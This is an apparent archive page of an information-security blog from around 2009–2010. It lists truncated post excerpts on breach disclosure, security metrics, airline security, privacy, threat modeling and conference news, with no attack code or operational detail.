David Bratzer is a police officer in Victoria, British Columbia. He’s a member of “Law Enforcement Against Prohibition,” and was going to address a conference this week. There’s a news video at “VicPD Officer Ordered to Stay Quiet.” In an article in the Huffington Post, “The Muzzling of a Cop” former Seattle Police Chief Norm […]

 

Logging practices

Via a tweet from @WeldPond, I was led to a Daily Mail article which discusses allegations that Facebook founder Mark Zuckerberg “hacked into the accounts of [Harvard] Crimson staff”. Now, I have no idea what happened or didn’t, and I will never have a FB account thanks to my concerns about their approach to privacy, […]

 

Elevation of Privilege: The Threat Modeling Game

In my work blog: “Announcing Elevation of Privilege: The Threat Modeling Game.” After RSA, I’ll have more to say about how it came about, how it helps you and how very new school it is. But if you’re here, you should come get a deck at the Microsoft booth (1500 row).

 

Elevation of Privilege: the Threat Modeling Game

In my work blog: “Announcing Elevation of Privilege: The Threat Modeling Game.” After RSA, I’ll have more to say about how it came about, how it helps you and how it helps more chaos emerge. But if you’re here, you should come get a deck at the Microsoft booth (1500 row).

 

Adam signing today at RSA

I’ll be in the RSA bookstore today at noon, signing books. Please drop on by. PS: I’m now signing Kindles, too.

 

News from RSA: U-Prove

In “U-Prove Minimal Disclosure availability,” Kim Cameron says: This blog is about technology issues, problems, plans for the future, speculative possibilities, long term ideas – all things that should make any self-respecting product marketer with concrete goals and metrics run for the hills! But today, just for once, I’m going to pick up an actual […]

 

Howard Schmidt's talk at RSA

The New York Times has a short article by Markoff, “U.S. to Reveal Rules on Internet Security.” The article focuses first on declassification, and goes on to say: In his first public speaking engagement at the RSA Conference, which is scheduled to open Tuesday, Mr. Schmidt said he would focus on two themes: partnerships and […]

 

The Economist on Breach Disclosure

In “New rules for big data,” the Economist seems to advocate for more disclosure of security problems: The benefits of information security—protecting computer systems and networks—are inherently invisible: if threats have been averted, things work as normal. That means it often gets neglected. One way to deal with that is to disclose more information. A […]

 

Puerto Rico: Biggest Identity Theft ever?

Apparently, the government of Puerto Rico has stolen the identities of something between 1.7 and 4.1 million people Native Puerto Ricans living outside the island territory are reacting with surprise and confusion after learning their birth certificates will become no good this summer. A law enacted by Puerto Rico in December mainly to combat identity […]

 

Human Error and Incremental Risk

As something of a follow-up to my last post on Aviation Safety, I heard this story about Toyota’s now very public quality concerns on NPR while driving my not-Prius to work last week. Driving a Toyota may seem like a pretty risky idea these days. For weeks now, weve been hearing scary stories about sudden […]

 

"We can’t circumvent our way around internet censorship."

That’s the key message of Ethan Zuckerman’s post “Internet Freedom: Beyond Circumvention.” I’ll repeat it: “We can’t circumvent our way around internet censorship.” It’s a long, complex post, and very much worth reading. It starts from the economics of running an ISP that can provide circumvention to all of China, goes to the side effects […]

 

Human Error

In his ongoing role of “person who finds things that I will find interesting,” Adam recently sent me a link to a paper titled “THE HUMAN FACTORS ANALYSIS AND CLASSIFICATION SYSTEM–HFACS,” which discusses the role of people in aviation accidents.  From the abstract: Human error has been implicated in 70 to 80% of all civil […]

 

Symantec State of Security 2010 Report Out

http://www.symantec.com/content/en/us/about/presskits/SES_report_Feb2010.pdf Thanks to big yellow for not making us register!  Oh, and Adam thanks you for not using pie charts…

 

In the "Nothing to Add" department

Nasty psychiatrissstss! Hates them, my precious! They locks uss up in padded cell! They makes uss look at inkblotsss! Tricksy, sly inkblotsss! Nasty Elvish pills burnsss our throat! … Yesss We Hatesss themsss Evil oness yess my preciousss we hatess themsss But They Helpsss us! No they hurtsss usss, hurtsss usss sore! NCBI ROFL: Did […]

 

Can I see some ID?

Or, Security and Privacy are Complimentary, Part MCVII: Later, I met one executive who told me that at the same time of my incident at another restaurant owned by the corporation, a server was using stolen credit card numbers by wearing a small camera on him. He would always check ID’s and would quickly flash […]

 

I'm not comfortable with that

The language of Facebook’s iPhone app is fascinating: If you enable this feature, all contacts from your device will be sent to Facebook…Please make sure your friends are comfortable with any use you make of their information. So first off, I don’t consent to you using that feature and providing my mobile phone number to […]

 

Adam & Andy Jaquith: A conversation

In December, Andy Jaquith and I had a fun conversation about info security with Bill Brenner listening in. The transcript is at “Meeting of the Minds,” and the audio is here.

 

Measuring the unmeasurable — inspiration from baseball

The New School approach to information security promotes the idea that we can make better security decisions if we can measure the effectiveness of alternatives.  Critics argue that so much of information security is unmeasurable, especially factors that shape risk, that quantitative approaches are futile.  In my opinion, that is just a critique of our current methods […]

 

Happy Valentine's Day!

They say that Y equals m-x plus b (well, when you remove the uncertainty). So let me reveal a secret confession: You’re the solution to my least squares obsession. stolen from the applied statistics blog

 

Open Security Foundation Looking for Advisors

Open Security Foundation – Advisory Board – Call for Nominations: The Open Security Foundation (OSF) is an internationally recognized 501(c)(3) non-profit public organization seeking senior leaders capable of providing broad-based perspective on information security, business management and fundraising to volunteer for an Advisory Board. The Advisory Board will provide insight and guidance when developing future […]

 

Saltzer, Schroeder, and Star Wars

When this blog was new, I did a series of posts on “The Security Principles of Saltzer and Schroeder,” illustrated with scenes from Star Wars. When I migrated the blog, the archive page was re-ordered, and I’ve just taken a few minutes to clean that up. The easiest to read version is “Security Principles of […]

 

My Sweet Lord, this is a Melancholy story

There’s an elephant of a story over at the New York Times, “Musician Apologizes for Advertising Track That Upset the White Stripes.” It’s all about this guy who wrote a song that ended up sounding an awful lot like a song that this other guy had written. And how this other guy (that being Mr. […]

 

Podcast on ISM3

Last week, I spoke at the Open Group meeting here in Seattle, and then recorded a podcast with Dana Gardner, Jim Hietala and Vicente Aceituno about ISM3 Brings Greater Standardization to Security Measurement Across Enterprise IT (audio) or you can read the transcript. It was fun, and the podcast is short and to the point. […]

 
 

Does It Matter If The APT Is "New"?

As best as I can describe the characteristics of the threat agents that would fit the label of APT, that threat community is very, very real.  It’s been around forever (someone mentioned first use of the term being 1993 or something) – we dealt with threat agents you would describe as “APT” at MicroSovled when […]

 

Applying Utility Functions To Humans?

From Less Wrong:  http://lesswrong.com/lw/1qk/applying_utility_functions_to_humans_considered/ I’m at The Open Group Security Forum this week in Seattle, speaking about risk and stuff.  Adam gave a great talk about Security: From Art to Science.  One recurring theme all week was the need to borrow from disciplines outside of Comp Sci and Engineering.   When we think about the […]

 

Off with their heads!

In a private conversation, someone said “has anyone in company‘s IT staff been fired for letting people do use that software?” I did some searching for “firing offenses” and I found a bunch of interesting random things. I’d like to quote one, “How can I fire a non-performer in today’s environment:” You may have some […]

 

V-22 Osprey Metrics

Metrics seem to be yet another way in which Angry Bear noticed that the V-22 Osprey program has hidden from its failure to deliver on its promises: Generally, mission capability runs 20% higher than availability, but availability is hidden on new stuff, while shouted about on older stuff, because there would be severe embarrassment if you […]

 

Security Blogger Awards

We’re honored to be nominated for “Most Entertaining Security Blog” at this years “2010 Social Security Blogger Awards.” Now, in a fair fight, we have no hope against Hoff’s BJJ, Mike Rothman’s incitefulness, Jack Daniel’s cynicism, or Erin’s sociability. But, really, there’s no reason for this to be a fair fight. So we’re asking our […]

 

The Best Question In Information Security

Ian Grigg seems to have kicked off a micro-trend with “The most magical question of all — why are so many bright people fooling themselves about the science in information security?.” Gunnar Peterson followed up with “Most Important Security Question: Cui Bono?” Both of these are really good questions, but I’m going to take issue […]

 

'Don't Ask, Don't Tell in Davos' — Act 3 in the Google-China affair

There is no better illustration of the institutional and social taboos surrounding data breach reporting and information security in general than the Google-Adobe-China affair. While the Big Thinkers at the World Economic Forum discussed every other idea under the sun, this one was taboo.

 

That's Some Serious Precision, or Watch Out, She's Gonna Go All Decimal!

So last night the family and I sat down and watched a little TV together for the first time in ages.  We happened to settle on the X-Games on ESPN, purely because they were showing a sport that I can only describe as Artistic Snowmobile Jumping.  Basically, these guys get on snowmobiles, jump them in […]

 

Today in Tyrranicide History

On January 30th, 1649, Charles I was beheaded for treason. He refused to enter a defense, asserting that as monarch, he was the law, and no court could try him. That same defense is raised today by Milošević, Hussien and other tyrants. The story of how John Cooke built his arguments against that claim is […]

 

Privacy and Security are Complimentary, Part MCIV

Privacy and security often complement each other in ways that are hard to notice. It’s much easier to present privacy and security as “in tension” or as a dependency. In this occasional series, we present ways in which they compliment each other. In this issue, the Financial Times reports that “Hackers target friends of Google […]

 

Quote For Today

Their judgment was based on wishful thinking rather than on sound calculation of probabilities; for the usual thing among men, is when they want something, they will, without any reflection, leave that to hope; which they will employ the full force of reasoning in rejecting what they find unpalatable. — Thucydides

 

Help EFF Measure Browser Uniqueness

The EFF is doing some measurement of browser uniqueness and privacy. It takes ten seconds. Before you go, why not estimate what fraction of users have the same transmitted/discoverable browser settings as you, and then check your accuracy at https://panopticlick.eff.org. Or start at http://www.eff.org/deeplinks/2010/01/help-eff-research-web-browser-tracking for a bit more detail.

 

Text Size (and testing)

Thank you for all the feedback in email & comments. Testing a new font size, feedback is again invited and welcome.

 
 

Shameless Self-Promotion

Hi, If you like risk, risk management, and metrics, I’ll be giving an online presentation you might want to see tomorrow at 2 EST: Gleaning Risk Management Data From Incidents http://www.brighttalk.com/webcasts/8093/attend

 

Migration

After more than 5 years, nearly 3,300 posts, and 6,300 comments on Movable Type, we’re migrating the blog to WordPress on a new host. Please let us know if I broke something. This is the new machine. Photo: Face the World with a Peaceful Mind, by Ting Hay.

 
 

Emergent Planetary Detection via Gravitational Lensing

The CBC Quirks and Quarks podcast on “The 10% Solar System Solution” is a really interesting 9 minutes with Scott Gaudi on how to find small planets far away: We have to rely on nature to give us the microlensing events. That means we can’t actually pick and choose which stars to look at, and […]

 

People are People, Too!

Apparently, corporations and unions can now spend unlimited funds on campaign advertisements. I’m hopeful that soon the Supreme Court will recognize that people are people too, and have the same free speech rights as corporations. Maybe, too, the Court will recognize that Congress may not limit the right of people to freely associate, and perhaps […]

 

The Face of FUD

A vivid image of Fear, Uncertainty, and Doubt (FUD), from an email promotion by NetWitness.

 

Why I Don't Like CRISC, Day Two

Yesterday, I offered up a little challenge to suggest that we aren’t ready for a certification around understanding information risk.  Today I want to mention why I think this CRISCy stuff is dangerous. What if how we’re approaching the subject is wrong?  What if it’s mostly wrong and horribly expensive? I’m going to offer that […]

 

Why I Don't Like CRISC

Recently, ISACA announced the CRISC certification.  There are many reasons I don’t like this, but to avoid ranting and in the interest of getting to the point, I’ll start with the main reason I’m uneasy about the CRISC certification: We’re not mature enough for a certification in risk management. Don’t believe me?  Good for you, […]

 

Doing threat intelligence right

To improve threat intelligence, it’s most important to address the flaws in how we interpret and use the intelligence that we already gather. Intelligence analysts are human beings, and many of their failures follow from intuitive ways of thinking that, while allowing the human mind to cut through reams of confusing information, often end up misleading us.

 

The Dog That Didn't Bark at Google

So it’s been all over everywhere that “uber-sophisticated” hackers walked all over Google’s internal network. Took their source, looked at email interception tools, etc. What’s most fascinating to me is that: Google’s customers don’t seem to be fleeing Google stock fell approximately 4% on the news they were hacked, while the market was down 2% […]

 

Does it include a launchpad?

The New York Times is reporting that there’s a “Deep Discount on Space Shuttles ,” they’re down to $28.8 million. But even more exciting than getting one of the 3 surviving monstrosities is that the main engines are free: As for the space shuttle main engines, those are now free. NASA advertised them in December […]

 

Wondering about Phenomenon

Yesterday, Russell posted in our amusements category about the avoidance of data sharing. He gives an anecdote about “you,” presumably a security professional, talking to executives about sharing security information. I’d like to offer an alternate anecdote. Executive: “So we got the audit report in, and it doesn’t look great. I was talking to some […]

 
 

Blogs worth reading, an occasional series

Dan Lohrmann’s “Why Do Security Professionals Fail?” So what works and what doesn’t seem to make much difference in getting consistently positive results? My answers will probably surprise you. I’m not the first person to ask this question. Conventional wisdom says we need more training and staff with more security certifications. Others say we need […]

 

Terrorism Links and quotes

Ed Hasbrouck on “Lessons from the case of the man who set his underpants on fire” A Canadian woman who’s been through the new process is too scared to fly. “Woman, 85, ‘terrified’ after airport search.” Peter Arnett reported “‘It became necessary to destroy the town to save it,’ a TSA major said today. He […]

 

Another Week, Another GSM Cipher Bites the Dust

Orr Dunkelman, Nathan Keller, and Adi Shamir have released a paper showing that they’ve broken KASUMI, the cipher used in encrypting 3G GSM communications. KASUMI is also known as A5/3, which is confusing because it’s only been a week since breaks on A5/1, a completely different cipher, were publicized. So if you’re wondering if this […]

 

Ignorance of the 4 new laws a day is no excuse

The lead of this story caught my eye: (CNN) — Legislatures in all 50 states, the District of Columbia, Guam, the Virgin Islands and Puerto Rico met in 2009, leading to the enactment of 40,697 laws, many of which take effect January 1. That’s an average of 753 laws passed in each of those jurisdictions. […]

 
 

Is Quantified Security a Weak Hypothesis?

I’ve recently read “Quantified Security is a Weak Hypothesis,” a paper which Vilhelm Verendel published at NSPW09. We’re discussing it in email, and I think it deserves some broader attention. My initial note was along these lines: I think the paper’s key hypothesis “securtity can be correctly represented with quantitative information” is overly broad. Can […]

 

768-bit RSA key factored

The paper is here. The very sane opening paragraph is: On December 12, 2009, we factored the 768-bit, 232-digit number RSA-768 by the number field sieve (NFS, [19]). The number RSA-768 was taken from the now obsolete RSA Challenge list [37] as a representative 768-bit RSA modulus (cf. [36]). This result is a record for […]

 

Comments on the Verizon DBIR Supplemental Report

On December 9th, Verizon released a supplement to their 2009 Data Breach Investigations Report. One might optimistically think of this as volume 2, #2 in the series. A good deal of praise has already been forthcoming, and I’m generally impressed with the report, and very glad it’s available and free. But in this post, I’m […]

 

Things Darwin Didn't Say

There’s a great line attributed to Darwin: “It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is most adaptable to change.” The trouble is, he never said it. Background here. Original sources are important and fun.

 

Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!

 

How not to do security, Drone Video Edition

This is probably considered to be “old news” by many, but I’m high-latency in my news at the moment. Much was made of the fact that the US Military’s enemies are now eavesdropping on the video feeds from US Drones on the battlefield using cheaply available commercial technology.  But it’s OK, because according to the […]

 

A Way Forward

Since writing the New School, I’ve been thinking a lot about why seems so hard to get there. There are two elements which Andrew and I didn’t explicitly write about which I think are tremendously important. Both of them have to do with the psychology of information security. The first is that security experts are […]

 

SearchSecurity Top Stories of 2009 Podcast

A few weeks ago, I joined the SearchSecurity team (Mike Mimoso, Rob Westervelt and Eric Parizo) to discuss the top cybersecurity stories of 2009. It was fun, and part 1 now available for a listen: part 1 (22:58), part 2 is still to come.

 

The Spectacle of Street View

Street with a View is an art project in Google Street View, with a variety of scenes enacted for the camera, either to be discovered in Street View, or discovered via the project web site. via David Fraser.

 

Comment Spam

We’ve been flooded with comment spam. I’ve added one of those annoying captcha things that don’t work, and a mandatory comment confirmation page. Please let me know if you have trouble. Blogname @ gmail.com, or adam @ blogname.com I think comments are working, but most won’t show up immediately. I’m digging into more effective solutions.

 
 

To the amazing chaos of the 2010s

I expect that there will be senseless acts of violence, planes destroyed and perhaps a city attacked with effective biological weapons. There will be crazy people with more power than we want to comprehend. There will be a billion malnourished, undereducated folks whose lives don’t improve. The first world will continue to be saddled with […]

 

Airplane Terrorism, Data-Driven Edition

I’m just off a flight from London back to the United States and I’m hesitant to attempt to think while jet-lagged.  I’ll have some more thoughts and first-hand observations once my head clears, however. In the meantime, Nate Silver has broken down the risk of terror attacks on airplanes so I don’t have to.  Summarizing […]

 

The New School of Air Travel Security?

As I simmer with anger over how TSA is subpoening bloggers, it occurs to me that the state of airline security is very similar to that of information security in some important ways: Failures are rare Partial failures are generally secret Actual failures are analyzed in secret Procedures are secret Procedures seem bizarre and arbitrary […]

 

What the FBI Was Doing on Beethoven's Birthday

This is unfair, but I can’t resist. Nine days before we found out again that PETN is hard to detonate, the FBI was keeping us safe: FBI FINALLY MAKES AN ARREST OVER ‘WOLVERINE’ LEAK The FBI has announced the capture of an individual connected with the leak of 20th Century Fox’s “X-Men Origins: Wolverine.” … […]

 

Abdulmutallab/Flight 253 Airline Terror links

Air Canada is canceling US flights because of security. (Thanks, @nselby!) The New York Times reports that “Britain Rejected Visa Renewal for Suspect.” NPR reported that the State Department may have raised some sort of flag, but I don’t have a link. ABC is reporting that two of the “al Qaeda Leaders Behind Northwest Flight […]

 

Observations on the Christmas Bomber

Since there’s been so much discussion about the Chrismas Bomber, I want to avoid going over the same ground everyone else is. So as much as I can, I’m going to try to stick to lightly-treaded ground. This is a failure for the terrorists. A big one. Think about it; put yourself on the other […]

 

Abdulmutallab/Flight 253 Airline Terror links

The Economist “The latest on Northwest flight 253:” “the people who run America’s airport security apparatus appear to have gone insane” and “This is the absolute worst sort of security theatre: inconvenient, absurd, and, crucially, ineffective.” Business Travel Coalition, via Dave Farber and Esther Dyson, “Aviation Security After Detroit:” “It is welcome news that President […]

 

76% Organic

The back does explain that it’s 76% organic petite sirah, and 24% non-organic grapes. I just thought it was a pretty funny thing to put on the front label, and wonder which consumers are going to be more likely to buy it, knowing that it’s 76% organic.

 
 

New Restrictions: No Using Electronic Devices for the Last Hour

Apparently, in the wake of thousands of deaths from idiots paying more attention to GPS, cell phones, GameBoys, iPods and other such electronic devices, TSA has announced a ban on all use of such devices for the last hour of your commute. No, just kidding. Apparently, they may be imposing new secret restrictions on use […]

 

Brian W Kernighan & Dennis M Ritchie & HP Lovecraft

I never heard of C Recursion till the day before I saw it for the first and– so far– last time. They told me the steam train was the thing to take to Arkham; and it was only at the station ticket-office, when I demurred at the high fare, that I learned about C Recursion. […]

 
 

Burning News: Gavle Goat

USA Today informs us that: Despite surveillance cameras and heavy security, vandals in a small Swedish town have burned down a giant Yuletide straw goat for the 24th time since 1966, the Associated Press reports. Here at Emergent Chaos, we’re deeply concerned that the goat ended up with neither privacy nor even temporary safety. Photo: […]

 

An Open Letter to the New Cyber-Security Czar

Dear Howard, Congratulations on the new job! Even as a cynic, I’m surprised at just how fast the knives have come out, declaring that you’ll get nothing done. I suppose that low expectations are easy to exceed. We both know you didn’t take this job because you expected it to be easy or fun, but […]

 
 

Biggest Breach Ever

Precision blogging gets the scoop: You’re probably talking about this terrible security disaster already: the largest database leak ever. Arweena, a spokes-elf for Santa Claus, admitted a few hours ago that the database posted at WikiLeaks yesterday is indeed the comprehensive 2009 list of which kids have been naughty, and which were nice. The source […]

 

NotObvious On Heartland

I posted this also to the securitymetrics.org mailing list.  Sorry if discussing in multiple  venues ticks you off. The Not Obvious blog has an interesting write up on the Heartland Breach and impact.  From the blog post: “Heartland has had to pay other fines to Visa and MasterCard, but the total of $12.6 million they […]

 

Open Thread

I’ll give you a topic, eh, no I won’t. Have at it, but not at each other.

 

For Blog/Twitter Conversation: Can You Defend "GRC"?

Longtime readers know that I’m not the biggest fan of GRC as it is “practiced” today.  I believe G & C are subservient to risk management. So let me offer you this statement to chew on: “A metric for Governance is only useful inasmuch as it describes an ability to manage risk” True or False, […]

 
 

St. Cajetan's Revenge

For some time, I’ve watched the War on Bottled Water with amusement. I don’t disagree with figuring out how to reduce waste, and so on and so forth, but the railing against bottled water per se struck me as not thought out very well. The major reason for my thinking is that I never heard […]

 

Top Security Stories of the Year?

On Wednesday, I’ll be joining a podcast to discuss “top security stories of the year.” I have a couple in mind, but I’d love to hear your nominations. What are the most important things which have happened in information security in the last year? (I posted this on Emergent Chaos, but forgot to post it […]

 

We Take Your Privacy Seriously

So after BNY Melon dropped a tape with my social security number and those of millions of my closest neighbors, they bought me a one year subscription to Experian’s “Triple Alert” credit monitoring service. Today, I got email telling me that there was new information, and so I went to login. Boy, am I glad […]

 

Data Not Assertions

There have already been a ton of posts out there about the Verizon DBIR Supplement that came out yesterday, so I’m not going to dive into the details, but I wanted to highlight this quick discussion from twitter yesterday that really sums of the value of the supplement and similar reports: georgevhulme: I’m glad we […]

 

Huh, who knew?

We have a comments feed. I suppose we should add that to somewhere sane. In the meanwhile, you should click here. We have smart commenters, and what they say is usually worthwhile.

 

Emerging threat: Social Botnets

We think of botnets as networks of computing devices slaved to some command & control system. But what about human-in-the-loop botnets, where humans are either participants or prime actors? I’m coining this label: “social botnets”. Recent example: “Health Insurers Caught Paying Facebook Gamers To Oppose Reform Bill”.

 

Top Security Stories of the Year?

Next week, I’ll be joining a podcast to discuss “top security stories of the year.” I have a couple in mind, but I’d love to hear your nominations. What are the most important things which have happened in information security in the last year?

 

NEW: Verizon 2009 DBIR Supplement

The supplement provides case studies, involving anonymous Verizon clients, that detail some of the tools and methods hackers used to compromise the more than 285 million sensitive records that were breached in 90 forensic cases Verizon handled last year.

 

Monkeys krak-oo krak-oo

According to “Campbell’s Monkeys Use Affixation to Alter Call Meaning:” We found that male alarm calls are composed of an acoustically variable stem, which can be followed by an acoustically invariable suffix. Using long-term observations and predator simulation experiments, we show that suffixation in this species functions to broaden the calls’ meaning by transforming a […]

 

Sweden: An Interesting Demographic Case Study In Internet Fraud

(quietly, wistfully singing “Yesterday” by the Beatles) From my favorite Swedish Infosec Blog, Crowmoor.se. I don’t speak Swedish, so I couldn’t really read the fine article they linked to.  Do go read their blog post, I’ll wait here. Back?  Great.  Here are my thoughts on those numbers: SWEDISH FRAUD STATISTICS RELEASED The World Bank estimates […]

 

Manditory web client scripts analogous to CDOs

The widespread and often mandatory use of client scripts in websites (e.g., JavaScript) are like CDOs [Collateralized Debt Obligations}. They both are designed by others with little interest in your security, they leverage your resources for their benefit, they are opaque, complex, nearly impossible to audit, and therefore untrustworthy.

 

Time to update your threat model to include "friendly fire"

If you work in InfoSec outside of the military, you may be thinking that “offensive cyber capability” don’t doesn’t apply to you. Don’t be so sure. I think it’s worth adding to the threat model for every organization. New “hacking gadgets” could be put in the hands of ordinary soldiers, turning them into the equivalent of “script kiddies”. But what if the potential target knows that such attacks may be coming. They could sets up a deceptive defense and redirect the attack to another network

 

TSA Security Operating Procedures

Via Gary Leff, we learn that “The TSA Puts Their Sensitive Security Screening Procedures Online For All To See (oops).” It’s another “we blacked out the doc without blacking out the data” story. The doc is 93 pages, and I don’t have time to more than skim it right now. I think that the redactions […]

 

All in the Presentation

America’s Finest News Source teaches an excellent lesson on how to spin data: Labor Dept: Available Labor Rate Increases To 10.2% WASHINGTON—In what is being touted by the Labor Department as extremely positive news, the nation’s available labor rate has reached double digits for the first time in 26 years, bringing the total number of […]

 

Engineers vs. Scammers

Adam recently sent me a link to a paper titled, “Understanding scam victims: seven principles for systems security.”  The paper examines a number of real-world (i.e. face-to-face) frauds and then extrapolates security principles which can be applied generically to both face-to-face and information or IT security problems. By illustrating these principles with examples taken from […]

 

A sociologist reads a Twitter feed

So, Adam retweets a hysterical reference to a viral email about an absolute genius of a Xmas light display made to look like an accident with a ladder, and the hapless homeowner left hanging from the gutter of his house. The email explains that the display was taken down after two days in large part […]

 
 
 

Fingerprinted and Facebooked at the Border

According to the Wall St Journal, “Iranian Crackdown Goes Global ,” Iran is monitoring Facebook, and in a move reminiscent of the Soviets, arresting people whose relatives criticize the regime online. That trend is part of a disturbing tendency to criminalize thoughts, intents, and violations of social norms, those things which are bad because they […]

 

Dilbert On Reusable Code

A while back I wrote an article on reusable code for ThreatPost. Today’s Dilbert, has an alternate, equally useful take on reusable code.

 

The stupidest post of the year?

George Hulme nominates this as the stupidest blog post of the year. I’m tempted to vote, although we have 30 more days. Business leaders need to understand there is no more need for proper security to justify itself over and over again. It saves you time and money (period). My take? Anytime someone says that […]

 

Miscommunicating risks to teenagers

A lesson in miscommunication of risk from “abstinence only” sex education aimed at teenagers. The educators emphasize the failure rate of condoms, but never mention the failure rate of abstinence-only policies when implemented by teenagers.

 

We've made piracy a community activity.

From BoingBoing: Somali nautical pirates have established a stock-market where guns and cash are invested in upcoming hijackings, with shares of the proceeds returned to investors Emergent Chaos strikes again…

 

The Market for Fake Police Badges

But in New York, a city that has become almost synonymous with high security, where office employees wear picture IDs and surveillance cameras are on the rise, some officers don’t wear their badges on patrol. Instead, they wear fakes. Called “dupes,” these phony badges are often just a trifle smaller than real ones but otherwise […]

 

Awesome Vendor-Speak

I received an unsolicited ( I’ve tried to unsubscribe several times there, techtarget ) email today, that I actually happened to open because it advertised an “integrated maturity model for governance and security”.  Yeah, I’m a sucker like that.  This is what I read: …a practical maturity model with illustrative use cases that can be […]

 

Chris Soghoian’s Surveillance Metrics

I also posted about this on Emergent Chaos, but since our readership doesn’t fully overlap, I’m commenting on it here as well. Chis Soghoian, has just posted some of his new research into government electronic surveillance here in the US. The numbers are truly astounding (Sprint for instance provided geo-location data on customers eight million […]

 
 

Visualization Monday: Storage

This is cool.  Visualization of relative storage capacities in terms of media and format. Notice that it goes all the way back into pre-digital forms, a subtle tweak that I’ll bet a lot of people miss on first inspection.  Too bad, too, since the ability to seamlessly compare seemingly-different things is a valuable skill when […]

 

2010 Security Prognosticators – Put Your Money Where Your Mouth Is!!!

Just saw where Symantec has released their 2010 Security Trends to watch.  Now not to pick on Symantec (I’m guilty of the same mess in the past myself over on my old blog) but usually these sorts of prognostication lists are full of the same horse@!@#$.  For example: 8.  Mac and Mobile Malware Will Increase […]

 

FBI Gets all New School

“Of the thousands of cases that we’ve investigated, the public knows about a handful,” said Shawn Henry, assistant director for the Federal Bureau of Investigation’s Cyber Division. “There are million-dollar cases that nobody knows about.” … “Keeping your head in the sand on filing a report means that the bad guys are out there hitting […]

 

Tifatul Sembiring Causes Disasters

The BBC reports that “Indonesia minister says immorality causes disasters:” A government minister has blamed Indonesia’s recent string of natural disasters on people’s immorality. Communication and Information Minister Tifatul Sembiring said that there were many television programmes that destroyed morals. Therefore, the minister said, natural disasters would continue to occur. His comments came as he […]

 
 

For Those Not In The US (or even if you are)

I’d like to wish US readers a happy Thanksgiving. For those outside of the US, I thought this would be a nice little post for today: A pointer to an article in the Financial Times, “Baseball’s love of statistics is taking over football“ Those who indulge my passion for analysis and for sport know that […]

 

An advance in the "balance" between security and privacy

Today on Thanksgiving, I’m thankful that the European Parliament has adopted what may be the first useful statement about the balance between security and privacy since Franklin: “… stresses that the EU is rooted in the principle of freedom. Security, in support of freedom, must be pursued through the rule of law and subject to […]

 

Less Is More

Great post today over on SecureThinking about a customer who used a very limited signature set for their IDS. Truth of the matter was that our customer knew exactly what he was doing. He only wanted to see a handful of signatures that were generic and could indicate that “something” was amiss that REALLY needed […]

 

Deny thy father and refuse thy gene sequence?

There’s a fascinating article in the NYTimes magazine, “Who Knew I Was Not the Father?” It’s all the impact of cheap paternity testing on conceptions of fatherhood. Men now have a cheap and easy way to discovering that children they thought were theirs really carry someone else’s genes. This raises the question, what is fatherhood? […]

 

Jail Time For ID Fraud

This past Friday, Baltimore resident, Michelle Courtney Johnson, was sentenced to 18 months in jail and a $200K fine for theft and use of PHI. According to her plea agreement and court documents, from August 2005 to April 2007, Johnson provided a conspirator with names, Social Security numbers and other identifying information of more than […]

 
 

Connecticut Attorney General On The March

It’s been a bad couple of weeks for residents of Connecticut and their personal health information. First Blue Cross Blue Shield had a laptop stolen with enough PHI that over 800K doctors were notified that their patients were at risk, including almost 19K in Connecticut. Connecticut’s attorney general said Monday that he’s investigating insurer Blue […]

 

Hackers treated as credible sources of information (D'oh!)

Contrary to popular belief, hackers are not credible sources of information that they themselves have stolen and leaked. Maybe they weren’t “hackers” at all. News organizations and bloggers should think more critically and do more investigation before they add to the “echo chamber effect” for such reports.

 

Poker Faced?

In “An Unstoppable Force Meets…” Haseeb writes about “we have just witnessed a monumental event in the history of online poker – the entrance of Isildur into our world of online poker.” Huh? Really? The post is jargon packed, and I’m not a poker player, but apparently this Isildur character has slaughtered all the best […]

 
 

Rational Ignorance: The Users' view of security

Cormac Herley at Microsoft Research has done us all a favor and released a paper So Long, And No Thanks for the Externalities:  The Rational Rejection of Security Advice by Users which opens its abstract with: It is often suggested that users are hopelessly lazy and unmotivated on security questions. They chose weak passwords, ignore […]

 

UK Confused About Piracy

According to BoingBoing, “Leaked UK government plan to create “Pirate Finder General” with power to appoint militias, create laws:” What that means is that an unelected official would have the power to do anything without Parliamentary oversight or debate, provided it was done in the name of protecting copyright. Mandelson elaborates on this, giving three […]

 

"80 Percent of Cyber Attacks Preventable"

Threatlevel (aka 27B/6) reported yesterday that Richard Schaeffer, the NSA’s information assurance director testified to the Senate Senate Judiciary Subcommittee on Terrorism, Technology and Homeland Security on the issue of computer based attacks. If network administrators simply instituted proper configuration policies and conducted good network monitoring, about 80 percent of commonly known cyber attacks could […]

 

Questions about Schaeffer's 80% improvement

According to Kim Zetter at Wired, in Senate testimony, Richard Schaeffer, the information assurance director at NSA, claimed that “If network administrators simply instituted proper configuration policies and conducted good network monitoring, about 80 percent of commonly known cyber attacks could be prevented.” I’m trying to find if that’s the FDCC (Federal Desktop Core Configuration), […]

 

FTC Delays Red Flags Enforcement Yet Again

I missed this when it hit the newswires two weeks ago, but the FTC has delayed enforcement of the Red Flags Rule. This change was in response to the American Bar Association successfully suing the FTC and being granted an injunction to prevent the Red Flags Rule being applied to lawyers. Similarly, the American Institute […]

 

ICSA Labs report

In the book, Andrew and I wrote about trading data for credibility. If Verizon’s enthusiasm for sharing their learning is any indication, the approach seems to be paying off in spades. At the Verizon Business blog, Wade Baker writes: Today ICSA Labs (an independent division of Verizon Business) released a report based on testing results […]

 

Can't tell the players without a program

You can’t tell the good guys from the bad guys without knowing the color of their hat. I wish there were some sort of map of the Black Hat ecosystem because it’s hard for non-specialists to tell. Case in point: Virscan.org. Looks like a nice, simple service that scan uploaded files using multiple AV software with latest signatures. But it seems *much* more useful to bad guys (malware writers and distributors) than for good guys. Who does it serve?

 

In the Proudest Traditions of the Royal Navy

The Royal Fleet Auxiliary ship Wave Knight watched a yacht be hijacked for fear of harming its passengers. All stand for a rousing round of “Ain’t gonna study war no more.”

 

Rich Mogull's Divine Assumptions

Our friend Rich Mogull has an interesting post up on his blog called “Always Assume“.  In it, he offers that “assumption” is part of a normal scenario building process, something that is fairly inescapable when making business decisions.  And he offers a simple, pragmatic process for assumptions which is mainly scenario development, justification, and action.    […]

 
 

Best Practices in Tax Management

Someone sent me a link to “How to Audit-Proof Your Tax Return: Don’t e-File,” by Paul Caron. In it he quotes a plausible theory that “you are giving the IRS easy electronic access to information it would otherwise have to enter, enabling the agency to examine your return and mine the data more easily than […]

 

CFP: 9th Workshop on the Economics of Information Security (WEIS)

